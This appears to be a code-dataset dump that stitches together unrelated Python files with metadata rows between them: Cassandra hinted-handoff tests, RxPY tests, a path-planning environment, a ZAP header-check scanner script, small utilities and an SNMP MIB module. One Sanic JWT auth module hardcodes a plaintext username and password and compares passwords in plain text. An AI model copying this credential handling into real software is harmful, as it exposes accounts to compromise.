assert 'Hinted handoff is running' == res.rstrip()
def test_hintedhandoff_disabled(self):
"""
Test global hinted handoff disabled
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': False})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is not running' == res.rstrip()
self._do_hinted_handoff(node1, node2, False)
def test_hintedhandoff_enabled(self):
"""
Test global hinted handoff enabled
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': True})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
self._do_hinted_handoff(node1, node2, True)
@since('4.0')
def test_hintedhandoff_setmaxwindow(self):
"""
Test global hinted handoff against max_hint_window_in_ms update via nodetool
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': True, "max_hint_window_in_ms": 300000})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
res = self._launch_nodetool_cmd(node, 'getmaxhintwindow')
assert 'Current max hint window: 300000 ms' == res.rstrip()
self._do_hinted_handoff(node1, node2, True)
node1.start()
for node in node1, node2:
# Make sure HH is effective on both nodes despite node startup races CASSANDRA-15865
self._launch_nodetool_cmd(node, 'setmaxhintwindow 1')
res = self._launch_nodetool_cmd(node, 'getmaxhintwindow')
assert 'Current max hint window: 1 ms' == res.rstrip()
self._do_hinted_handoff(node1, node2, False, keyspace='ks2')
def test_hintedhandoff_dc_disabled(self):
"""
Test global hinted handoff enabled with the dc disabled
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': True,
'hinted_handoff_disabled_datacenters': ['dc1']})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running{}Data center dc1 is disabled'.format(os.linesep) == res.rstrip()
self._do_hinted_handoff(node1, node2, False)
def test_hintedhandoff_dc_reenabled(self):
"""
Test global hinted handoff enabled with the dc disabled first and then re-enabled
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': True,
'hinted_handoff_disabled_datacenters': ['dc1']})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running{}Data center dc1 is disabled'.format(os.linesep) == res.rstrip()
for node in node1, node2:
self._launch_nodetool_cmd(node, 'enablehintsfordc dc1')
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
self._do_hinted_handoff(node1, node2, True)
class TestHintedHandoff(Tester):
@ported_to_in_jvm('4.0')
@pytest.mark.no_vnodes
def test_hintedhandoff_decom(self):
self.cluster.populate(4).start()
[node1, node2, node3, node4] = self.cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 2)
create_c1c2_table(self, session)
node4.stop(wait_other_notice=True)
insert_c1c2(session, n=100, consistency=ConsistencyLevel.ONE)
node1.decommission()
node4.start(wait_for_binary_proto=True)
force = True if self.cluster.version() >= '3.12' else False
node2.decommission(force=force)
node3.decommission(force=force)
time.sleep(5)
for x in range(0, 100):
query_c1c2(session, x, ConsistencyLevel.ONE)
@since('4.1')
def test_hintedhandoff_window(self):
"""
Test that we only store at a maximum the hint window worth of hints.
Prior to CASSANDRA-14309 we would store another window worth of hints
if the down node was brought up and then taken back down immediately.
We would also store another window of hints on a live node if the live
node was restarted.
@jira_ticket CASSANDRA-14309
"""
# hint_window_persistent_enabled is set to true by default
self.cluster.set_configuration_options({'max_hint_window_in_ms': 5000,
'hinted_handoff_enabled': True,
'max_hints_delivery_threads': 1,
'hints_flush_period_in_ms': 100, })
self.cluster.populate(2).start()
node1, node2 = self.cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 2)
create_c1c2_table(self, session)
# Stop handoff until very end and take node2 down for first round of hints
node1.nodetool('pausehandoff')
node2.nodetool('disablebinary')
node2.nodetool('disablegossip')
# First round of hints. We expect these to be replayed and the only
# hints within the window
insert_c1c2(session, n=(0, 100), consistency=ConsistencyLevel.ONE)
# Let hint window pass
time.sleep(10)
# Re-enable and disable the node. Prior to CASSANDRA-14215 this should make the hint window on node1 reset.
node2.nodetool('enablegossip')
node2.nodetool('disablegossip')
# Second round of inserts. We do not expect hints to be stored.
insert_c1c2(session, n=(100, 200), consistency=ConsistencyLevel.ONE)
# Restart node1. Prior to CASSANDRA-14215 this would reset node1's hint window.
node1.stop()
node1.start(wait_for_binary_proto=True, wait_other_notice=False)
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
# Third round of inserts. We do not expect hints to be stored.
insert_c1c2(session, n=(200, 300), consistency=ConsistencyLevel.ONE)
# Enable node2 and wait for hints to be replayed
node2.nodetool('enablegossip')
node2.nodetool('enablebinary')
node1.nodetool('resumehandoff')
node1.watch_log_for('Finished hinted handoff')
# Stop node1 so that we only query node2
node1.stop()
session = self.patient_exclusive_cql_connection(node2)
session.execute('USE ks')
# Ensure first dataset is present (through replayed hints)
for x in range(0, 100):
query_c1c2(session, x, ConsistencyLevel.ONE)
# Ensure second and third datasets are not present
for x in range(100, 300):
query_c1c2(session, x, ConsistencyLevel.ONE, tolerate_missing=True, must_be_missing=True)
| 40.192453
| 118
| 0.648202
| 10,276
| 0.964792
| 0
| 0
| 10,246
| 0.961975
| 0
| 0
| 3,561
| 0.334335
|
65be1ffede01306450a5f34b42845bf53968f1d8
| 248
|
py
|
Python
|
pre_definition/solve_caller.py
|
sr9000/stepik_code_task_baking
|
60a5197f659db1734132eeb9d82624f1b7aaeb3f
|
[
"MIT"
] | null | null | null |
pre_definition/solve_caller.py
|
sr9000/stepik_code_task_baking
|
60a5197f659db1734132eeb9d82624f1b7aaeb3f
|
[
"MIT"
] | null | null | null |
pre_definition/solve_caller.py
|
sr9000/stepik_code_task_baking
|
60a5197f659db1734132eeb9d82624f1b7aaeb3f
|
[
"MIT"
] | null | null | null |
from collections.abc import Iterable as ABCIterable
def call_with_args(func, args):
if isinstance(args, dict):
return func(**args)
elif isinstance(args, ABCIterable):
return func(*args)
else:
return func(args)
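# Dispatch is by argument container type, e.g. with f = lambda a, b=0: (a, b):
#     call_with_args(f, {'a': 1, 'b': 2})  -> f(a=1, b=2)
#     call_with_args(f, [1, 2])            -> f(1, 2)
#     call_with_args(f, 3)                 -> f(3)
# dicts are checked first, so a dict is always expanded as keyword arguments.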
| 22.545455
| 51
| 0.665323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
65bea9d189e5ba73f3c48d6d3eae40bf9da3717b
| 817
|
py
|
Python
|
wikipedia_test.py
|
pedrogengo/TopicBlob
|
e6a7736d39c7a174d0289b21c152cd8bb02f2669
|
[
"Apache-2.0"
] | null | null | null |
wikipedia_test.py
|
pedrogengo/TopicBlob
|
e6a7736d39c7a174d0289b21c152cd8bb02f2669
|
[
"Apache-2.0"
] | null | null | null |
wikipedia_test.py
|
pedrogengo/TopicBlob
|
e6a7736d39c7a174d0289b21c152cd8bb02f2669
|
[
"Apache-2.0"
] | null | null | null |
import wikipedia
from topicblob import TopicBlob
#get random Wikipedia summaries
wiki_pages = ["Facebook","New York City","Barack Obama","Wikipedia","Topic Modeling","Python (programming language)","Snapchat"]
wiki_pages = ["Facebook","New York City","Barack Obama"]
texts = []
for page in wiki_pages:
text = wikipedia.summary(page)
#print(text)
texts.append(text)
tb = TopicBlob(texts, 20, 50)
#Do topic search for social
topic_search = tb.search_docs_by_topics("social")
print(topic_search)
print("\n")
#Do a ranked search for president
search = tb.ranked_search_docs_by_words("president")
print(search)
print("\n")
#Find similar text for
print("Finding similar document for\n" + tb.blobs[0]["doc"])
print("\n")
sims = tb.get_sim(0)
for sim in sims.keys():
print(tb.get_doc(sim))
| 18.568182
| 128
| 0.71481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 340
| 0.416157
|
65c19e6d0f4a645a3e85871f601e50a70618990c
| 215
|
py
|
Python
|
component/model/dmp_model.py
|
12rambau/damage_proxy_maps
|
98a004bf4420c6ce1b7ecd77e426e8fe7d512f52
|
[
"MIT"
] | 1
|
2021-09-01T18:27:19.000Z
|
2021-09-01T18:27:19.000Z
|
component/model/dmp_model.py
|
12rambau/damage_proxy_maps
|
98a004bf4420c6ce1b7ecd77e426e8fe7d512f52
|
[
"MIT"
] | 3
|
2021-06-01T10:15:36.000Z
|
2021-10-07T10:00:16.000Z
|
component/model/dmp_model.py
|
12rambau/damage_proxy_maps
|
98a004bf4420c6ce1b7ecd77e426e8fe7d512f52
|
[
"MIT"
] | 2
|
2021-06-01T10:16:03.000Z
|
2021-06-10T12:43:47.000Z
|
from sepal_ui import model
from traitlets import Any
class DmpModel(model.Model):
# inputs
event = Any(None).tag(sync=True)
username = Any(None).tag(sync=True)
password = Any(None).tag(sync=True)
| 19.545455
| 39
| 0.693023
| 159
| 0.739535
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.037209
|
65c1e68e0dc7466b357152cbb876f5ad24ac99ef
| 9,154
|
py
|
Python
|
SaIL/envs/state_lattice_planner_env.py
|
yonetaniryo/SaIL
|
c7404024c7787184c3638e9730bd185373ed0bf6
|
[
"BSD-3-Clause"
] | 12
|
2018-05-18T19:29:09.000Z
|
2020-05-15T13:47:12.000Z
|
SaIL/envs/state_lattice_planner_env.py
|
yonetaniryo/SaIL
|
c7404024c7787184c3638e9730bd185373ed0bf6
|
[
"BSD-3-Clause"
] | 1
|
2018-05-18T19:36:42.000Z
|
2018-07-20T03:03:13.000Z
|
SaIL/envs/state_lattice_planner_env.py
|
yonetaniryo/SaIL
|
c7404024c7787184c3638e9730bd185373ed0bf6
|
[
"BSD-3-Clause"
] | 10
|
2018-01-11T21:23:40.000Z
|
2021-11-10T04:38:07.000Z
|
#!/usr/bin/env python
"""An environment that takes as input databases of environments and runs episodes,
where each episode runs a search-based planner. It then returns the average number of expansions,
and features (if training)
Author: Mohak Bhardwaj
"""
from collections import defaultdict
import os
import pickle
import time
import numpy as np
from SaIL.learners.supervised_regression_network import SupervisedRegressionNetwork
from planning_python.data_structures.priority_queue import PriorityQueue
from planning_python.planners.search_based_planner import SearchBasedPlanner
from planning_python.environment_interface.env_2d import Env2D
from planning_python.state_lattices.common_lattice.xy_analytic_lattice import XYAnalyticLattice
from planning_python.state_lattices.common_lattice.xyh_analytic_lattice import XYHAnalyticLattice
from planning_python.cost_functions.cost_function import PathLengthNoAng, DubinsPathLength
from planning_python.heuristic_functions.heuristic_function import EuclideanHeuristicNoAng, ManhattanHeuristicNoAng, DubinsHeuristic
from planning_python.data_structures.planning_problem import PlanningProblem
class StateLatticePlannerEnv(SearchBasedPlanner):
def __init__(self, env_params, lattice_type, lattice_params, cost_fn, learner_params):
self.env_params = env_params
self.cost_fn = cost_fn
self.lattice_type = lattice_type
if lattice_type == "XY":
self.lattice = XYAnalyticLattice(lattice_params)
self.start_n = self.lattice.state_to_node((lattice_params['x_lims'][0], lattice_params['y_lims'][0]))
self.goal_n = self.lattice.state_to_node((lattice_params['x_lims'][1]-1, lattice_params['y_lims'][0]-1))
elif lattice_type == "XYH":
self.lattice = XYHAnalyticLattice(lattice_params)
self.start_n = self.lattice.state_to_node((lattice_params['x_lims'][0], lattice_params['y_lims'][0], 0))
self.goal_n = self.lattice.state_to_node((lattice_params['x_lims'][1]-1, lattice_params['y_lims'][0]-1, 0))
self.lattice.precalc_costs(self.cost_fn) #Enumerate and cache successors and edge costs
self.learner_policy = None #This will be set prior to running a policy using set_learner_policy
#Data structures for planning
self.frontier = [] #Frontier is un-sorted as it is sorted on demand (using heuristic)
self.oracle_frontier = PriorityQueue() #Frontier sorted according to oracle(for mixing)
self.visited = {} #Keep track of visited cells
self.c_obs = [] #Keep track of collision checks done so far
self.cost_so_far = defaultdict(lambda: np.inf) #Keep track of cost of path to the node
self.came_from = {} #Keep track of parent during search
self.learner = SupervisedRegressionNetwork(learner_params) #learner is a part of the environment
def initialize(self, env_folder, oracle_folder, num_envs, file_start_num, phase='train', visualize=False):
"""Initialize everything"""
self.env_folder = env_folder
self.oracle_folder = oracle_folder
self.num_envs = num_envs
self.phase = phase
self.visualize = visualize
self.curr_env_num = file_start_num - 1
def set_mixing_param(self, beta):
self.beta = beta
def run_episode(self, k_tsteps=None, max_expansions=1000000):
assert self.initialized == True, "Planner has not been initialized properly. Please call initialize or reset_problem function before plan function"
start_t = time.time()
data = [] #Dataset that will be filled during training
self.came_from[self.start_n]= (None, None)
self.cost_so_far[self.start_n] = 0. #For each node, this is the cost of the shortest path to the start
self.num_invalid_predecessors[self.start_n] = 0
self.num_invalid_siblings[self.start_n] = 0
self.depth_so_far[self.start_n] = 0
if self.phase == "train":
start_h_val = self.oracle[self.start_n]
self.oracle_frontier.put(self.start_n, start_h_val)
self.frontier.append(self.start_n) #This frontier is just a list
curr_expansions = 0 #Number of expansions done
num_rexpansions = 0
found_goal = False
path =[]
path_cost = np.inf
while len(self.frontier) > 0:
#Check 1: Stop search if frontier gets too large
if curr_expansions >= max_expansions:
print("Max Expansions Done.")
break
#Check 2: Stop search if open list gets too large
if len(self.frontier) > 500000:
print("Timeout.")
break
#################################################################################################
#Step 1: With probability beta, we select the oracle and (1-beta) we select the learner, also we collect data if
# curr_expansions is in one of the k timesteps
if self.phase == "train":
if curr_expansions in k_tsteps:
rand_idx = np.random.randint(len(self.frontier))
n = self.frontier[rand_idx] #Choose a random action
data.append((self.get_feature_vec[n], self.curr_oracle[n])) #Query oracle for Q-value of that action and append to dataset
if np.random.random() <= self.beta:
h, curr_node = self.oracle_frontier.get()
else:
curr_node = self.get_best_node()
else:
curr_node = self.get_best_node()
#################################################################################################
if curr_node in self.visited:
continue
#Step 3: Add to visited
self.visited[curr_node] = 1
#Check 3: Stop search if goal found
if curr_node == self.goal_node:
print("Found goal")
found_goal = True
break
#Step 4: If search has not ended, add neighbors of current node to frontier
neighbors, edge_costs, valid_edges, invalid_edges = self.get_successors(curr_node)
#Update the features of the parent and current node
n_invalid_edges = len(invalid_edges)
self.num_invalid_grand_children[self.came_from[curr_node][0]] += n_invalid_edges
self.num_invalid_children[curr_node] = n_invalid_edges
#Step 5: Update c_obs with collision checks performed
self.c_obs.append(invalid_edges)
g = self.cost_so_far[curr_node]
for i, neighbor in enumerate(neighbors):
new_g = g + edge_costs[i]
if neighbor not in self.visited:
#Add neighbor to open only if it wasn't in open already (don't need duplicates) [Note: Only do this if ordering in the frontier doesn't matter]
if neighbor not in self.cost_so_far:
#Update the oracle frontier only during training (for mixing)
if self.phase == "train":
h_val = self.curr_oracle[neighbor]
self.oracle_frontier.put(neighbor, h_val)
self.frontier.append(neighbor)
#Keep track of cost of shortest path to neighbor and parent it came from (for features and reconstruct path)
if new_g < self.cost_so_far[neighbor]:
self.came_from[neighbor] = (curr_node, valid_edges[i])
self.cost_so_far[neighbor] = new_g
#Update feature dicts
self.learner.cost_so_far[neighbor] = new_g
self.learner.num_invalid_predecessors[neighbor] = self.num_invalid_predecessors[curr_node] + n_invalid_edges
self.learner.num_invalid_siblings[neighbor] = n_invalid_edges
self.learner.depth_so_far[neighbor] = self.depth_so_far[curr_node] + 1
#Step 6:increment number of expansions
curr_expansions += 1
if found_goal:
path, path_cost = self.reconstruct_path(self.came_from, self.start_node, self.goal_node, self.cost_so_far)
else:
print ('Found no solution, priority queue empty')
time_taken = time.time()- start_t
return path, path_cost, curr_expansions, time_taken, self.came_from, self.cost_so_far, self.c_obs #Run planner on current env and return data seen. Also, update current env to next env
def get_heuristic(self, node, goal):
"""Given a node and goal, calculate features and get heuristic value"""
return 0
def get_best_node(self):
"""Evaluates all the nodes in the frontier and returns the best node"""
return None
def sample_world(self, mode='cycle'):
self.curr_env_num = (self.curr_env_num+1)%self.num_envs
file_path = os.path.join(os.path.abspath(self.env_folder), str(self.curr_env_num)+'.png')
self.curr_env = self.initialize_env_from_file(file_path)
def compute_oracle(self, mode='cycle'):
file_path = os.path.join(os.path.abspath(self.oracle_folder), "oracle_"+str(self.curr_env_num)+'.p')
self.curr_oracle = pickle.load(open(file_path, 'rb'))
def initialize_env_from_file(self, file_path):
env = Env2D()
env.initialize(file_path, self.env_params)
if self.visualize:
env.initialize_plot(self.lattice.node_to_state(self.start_node), self.lattice.node_to_state(self.goal_node))
self.initialized = True
return env
def clear_planner(self):
self.frontier.clear()
self.visited = {}
self.c_obs = []
self.cost_so_far = {}
self.came_from = {}
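# Expected driving loop (a sketch inferred from the methods above): call initialize(...)
# once, then per iteration set_mixing_param(beta), sample_world(), compute_oracle(),
# and run_episode(k_tsteps, max_expansions) to collect (feature, oracle value) pairs
# for the learner.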
| 45.093596
| 192
| 0.693358
| 8,038
| 0.878086
| 0
| 0
| 0
| 0
| 0
| 0
| 2,606
| 0.284684
|
65c266ffeb9dad82408ef950252b4d7368839fc3
| 966
|
py
|
Python
|
opi_dragon_api/auth/__init__.py
|
CEAC33/opi-dragon-api
|
8f050a0466dab4aaeec13151b9f49990bbd73640
|
[
"MIT"
] | null | null | null |
opi_dragon_api/auth/__init__.py
|
CEAC33/opi-dragon-api
|
8f050a0466dab4aaeec13151b9f49990bbd73640
|
[
"MIT"
] | null | null | null |
opi_dragon_api/auth/__init__.py
|
CEAC33/opi-dragon-api
|
8f050a0466dab4aaeec13151b9f49990bbd73640
|
[
"MIT"
] | null | null | null |
from sanic_jwt import exceptions
class User:
def __init__(self, id, username, password):
self.user_id = id
self.username = username
self.password = password
def __repr__(self):
return "User(id='{}')".format(self.user_id)
def to_dict(self):
return {"user_id": self.user_id, "username": self.username}
users = [User(1, "opi-user", "~Zñujh*B2D`9T!<j")]
username_table = {u.username: u for u in users}
userid_table = {u.user_id: u for u in users}
async def my_authenticate(request, *args, **kwargs):
username = request.json.get("username", None)
password = request.json.get("password", None)
if not username or not password:
raise exceptions.AuthenticationFailed("Missing username or password.")
user = username_table.get(username, None)
if user is None or password != user.password:
raise exceptions.AuthenticationFailed("Incorrect username or password")
return user
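# Typical wiring (a sketch; assumes a Sanic `app` object created elsewhere):
#     from sanic_jwt import Initialize
#     Initialize(app, authenticate=my_authenticate)
# sanic_jwt then issues tokens for the User objects returned by my_authenticate.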
| 29.272727
| 79
| 0.677019
| 321
| 0.331954
| 0
| 0
| 0
| 0
| 463
| 0.4788
| 146
| 0.150982
|
65c2afb8b2d130681f854965474e19205bdcd378
| 5,087
|
py
|
Python
|
tests/test_observable/test_dowhile.py
|
yutiansut/RxPY
|
c3bbba77f9ebd7706c949141725e220096deabd4
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2018-11-16T09:07:13.000Z
|
2018-11-16T09:07:13.000Z
|
tests/test_observable/test_dowhile.py
|
yutiansut/RxPY
|
c3bbba77f9ebd7706c949141725e220096deabd4
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tests/test_observable/test_dowhile.py
|
yutiansut/RxPY
|
c3bbba77f9ebd7706c949141725e220096deabd4
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2020-05-08T08:23:08.000Z
|
2020-05-08T08:23:08.000Z
|
import unittest
from rx.testing import TestScheduler, ReactiveTest
class TestDoWhile(ReactiveTest, unittest.TestCase):
def test_dowhile_always_false(self):
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(
self.on_next(50, 1),
self.on_next(100, 2),
self.on_next(150, 3),
self.on_next(200, 4),
self.on_completed(250))
def create():
return xs.do_while(lambda _: False)
results = scheduler.start(create=create)
assert results.messages == [
self.on_next(250, 1),
self.on_next(300, 2),
self.on_next(350, 3),
self.on_next(400, 4),
self.on_completed(450)]
assert xs.subscriptions == [self.subscribe(200, 450)]
def test_dowhile_always_true(self):
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(
self.on_next(50, 1),
self.on_next(100, 2),
self.on_next(150, 3),
self.on_next(200, 4),
self.on_completed(250))
def create():
return xs.do_while(lambda _: True)
results = scheduler.start(create=create)
assert results.messages == [
self.on_next(250, 1),
self.on_next(300, 2),
self.on_next(350, 3),
self.on_next(400, 4),
self.on_next(500, 1),
self.on_next(550, 2),
self.on_next(600, 3),
self.on_next(650, 4),
self.on_next(750, 1),
self.on_next(800, 2),
self.on_next(850, 3),
self.on_next(900, 4)]
assert xs.subscriptions == [
self.subscribe(200, 450),
self.subscribe(450, 700),
self.subscribe(700, 950),
self.subscribe(950, 1000)]
def test_dowhile_always_true_on_error(self):
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(self.on_error(50, ex))
def create():
return xs.do_while(lambda _: True)
results = scheduler.start(create=create)
assert results.messages == [self.on_error(250, ex)]
assert xs.subscriptions == [self.subscribe(200, 250)]
def test_dowhile_always_true_infinite(self):
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(self.on_next(50, 1))
def create():
return xs.do_while(lambda _: True)
results = scheduler.start(create=create)
assert results.messages == [
self.on_next(250, 1)]
assert xs.subscriptions == [self.subscribe(200, 1000)]
def test_dowhile_sometimes_true(self):
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(
self.on_next(50, 1),
self.on_next(100, 2),
self.on_next(150, 3),
self.on_next(200, 4),
self.on_completed(250))
n = [0]
def create():
def condition(x):
n[0] += 1
return n[0]<3
return xs.do_while(condition)
results = scheduler.start(create=create)
assert results.messages == [
self.on_next(250, 1),
self.on_next(300, 2),
self.on_next(350, 3),
self.on_next(400, 4),
self.on_next(500, 1),
self.on_next(550, 2),
self.on_next(600, 3),
self.on_next(650, 4),
self.on_next(750, 1),
self.on_next(800, 2),
self.on_next(850, 3),
self.on_next(900, 4),
self.on_completed(950)]
assert xs.subscriptions == [
self.subscribe(200, 450),
self.subscribe(450, 700),
self.subscribe(700, 950)]
def test_dowhile_sometimes_throws(self):
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(
self.on_next(50, 1),
self.on_next(100, 2),
self.on_next(150, 3),
self.on_next(200, 4),
self.on_completed(250))
n = [0]
def create():
def condition(x):
n[0] += 1
if n[0]<3:
return True
else:
raise Exception(ex)
return xs.do_while(condition)
results = scheduler.start(create=create)
assert results.messages == [
self.on_next(250, 1),
self.on_next(300, 2),
self.on_next(350, 3),
self.on_next(400, 4),
self.on_next(500, 1),
self.on_next(550, 2),
self.on_next(600, 3),
self.on_next(650, 4),
self.on_next(750, 1),
self.on_next(800, 2),
self.on_next(850, 3),
self.on_next(900, 4),
self.on_error(950, ex)]
assert xs.subscriptions == [
self.subscribe(200, 450),
self.subscribe(450, 700),
self.subscribe(700, 950)]
| 31.79375
| 68
| 0.525654
| 5,016
| 0.986043
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.001573
|
65c311baef365241a86f5ea9eee583a30d354076
| 1,459
|
py
|
Python
|
ZAP_Scripts/passive/14-4-2-api-content-disposition-header.py
|
YaleUniversity/ZAP_ASVS_Checks
|
f69b57f5fe0bc196ffc57fb1bb0762ffb367c1cb
|
[
"MIT"
] | 3
|
2022-01-22T11:21:23.000Z
|
2022-03-09T06:45:55.000Z
|
ZAP_Scripts/passive/14-4-2-api-content-disposition-header.py
|
YaleUniversity/ZAP_ASVS_Checks
|
f69b57f5fe0bc196ffc57fb1bb0762ffb367c1cb
|
[
"MIT"
] | null | null | null |
ZAP_Scripts/passive/14-4-2-api-content-disposition-header.py
|
YaleUniversity/ZAP_ASVS_Checks
|
f69b57f5fe0bc196ffc57fb1bb0762ffb367c1cb
|
[
"MIT"
] | null | null | null |
"""
Script testing 14.4.2 control from OWASP ASVS 4.0:
'Verify that all API responses contain a Content-Disposition: attachment;
filename="api.json" header (or other appropriate filename for the content
type).'
The script will raise an alert if 'Content-Disposition' header is present but not follow the format - Content-Disposition: attachment; filename=
"""
def scan(ps, msg, src):
#find "Content-Disposition" header
header = str(msg.getResponseHeader().getHeader("Content-Disposition"))
#alert parameters
alertRisk= 1
alertConfidence = 2
alertTitle = "14.4.2 Verify that all API responses contain a Content-Disposition."
alertDescription = "Verify that all API responses contain a Content-Disposition: attachment; filename='api.json' header (or other appropriate filename for the content type)."
url = msg.getRequestHeader().getURI().toString()
alertParam = ""
alertAttack = ""
alertInfo = "https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload"
alertSolution = "Use the format 'Content-Disposition: attachment; filename=' for API responses"
alertEvidence = ""
cweID = 116
wascID = 0
# if "attachment; filename=" is not in "Content-Disposition" header, raise alert
if ("attachment; filename=" not in header.lower()):
ps.raiseAlert(alertRisk, alertConfidence, alertTitle, alertDescription,
url, alertParam, alertAttack, alertInfo, alertSolution, alertEvidence, cweID, wascID, msg);
| 41.685714
| 175
| 0.749143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 921
| 0.631254
|
65c34c95b750096053aaef54a2b648be5c44772c
| 230
|
py
|
Python
|
server.py
|
Peopple-Shopping-App/mockserver
|
c38c3f325e44f4eaba39cdbe24544e3181307218
|
[
"MIT"
] | 1
|
2021-07-23T03:43:19.000Z
|
2021-07-23T03:43:19.000Z
|
server.py
|
Peopple-Shopping-App/mockserver
|
c38c3f325e44f4eaba39cdbe24544e3181307218
|
[
"MIT"
] | null | null | null |
server.py
|
Peopple-Shopping-App/mockserver
|
c38c3f325e44f4eaba39cdbe24544e3181307218
|
[
"MIT"
] | null | null | null |
import uvicorn
if __name__ == '__main__':
    # Serve on port 80 by default; switch to a high port such as 2323 for local runs
    # where binding to port 80 requires elevated privileges.
    uvicorn.run('app.main:app', host='0.0.0.0', port=80)
| 23
| 58
| 0.630435
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 56
| 0.243478
|
65c37b82e34797425fdb4ac383cf6c771dd605d3
| 399
|
py
|
Python
|
9020/main.py
|
yeonghoey/baekjoon
|
a3f7c0aa901ad0e2ca6a863f1867fc574feb8c8e
|
[
"MIT"
] | 1
|
2018-09-20T05:15:30.000Z
|
2018-09-20T05:15:30.000Z
|
9020/main.py
|
yeonghoey/baekjoon
|
a3f7c0aa901ad0e2ca6a863f1867fc574feb8c8e
|
[
"MIT"
] | null | null | null |
9020/main.py
|
yeonghoey/baekjoon
|
a3f7c0aa901ad0e2ca6a863f1867fc574feb8c8e
|
[
"MIT"
] | null | null | null |
MAX_N = 10000 + 1
isprime = [True] * (MAX_N)
isprime[0] = False
isprime[1] = False
for i in range(2, MAX_N):
if not isprime[i]:
continue
for j in range(i+i, MAX_N, i):
isprime[j] = False
T = int(input())
for _ in range(T):
n = int(input())
for i in range(n//2, 1, -1):
if isprime[i] and isprime[n-i]:
print('%d %d' % (i, n-i))
break
| 21
| 39
| 0.513784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0.017544
|
65c451b4c4af62ac430c54bacf4793ebfef0c2ef
| 48,201
|
py
|
Python
|
pysnmp-with-texts/DOCS-LOADBALANCING-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/DOCS-LOADBALANCING-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/DOCS-LOADBALANCING-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module DOCS-LOADBALANCING-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/DOCS-LOADBALANCING-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:53:17 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
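# The module covers the CMTS load balancing objects: the system-wide enable flag,
# change-over control and status, load balancing groups, their channels and channel
# pairs, restricted cable modem lists, and load balancing policies with the DOCSIS
# basic rule set.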
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueSizeConstraint, ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint")
clabProjDocsis, = mibBuilder.importSymbols("CLAB-DEF-MIB", "clabProjDocsis")
docsIfCmtsCmStatusIndex, docsIfCmtsCmStatusEntry = mibBuilder.importSymbols("DOCS-IF-MIB", "docsIfCmtsCmStatusIndex", "docsIfCmtsCmStatusEntry")
InterfaceIndex, = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex")
ObjectGroup, NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "ObjectGroup", "NotificationGroup", "ModuleCompliance")
ModuleIdentity, Gauge32, Counter32, IpAddress, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, NotificationType, Bits, TimeTicks, Counter64, Unsigned32, zeroDotZero, Integer32, iso, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "Gauge32", "Counter32", "IpAddress", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "NotificationType", "Bits", "TimeTicks", "Counter64", "Unsigned32", "zeroDotZero", "Integer32", "iso", "ObjectIdentity")
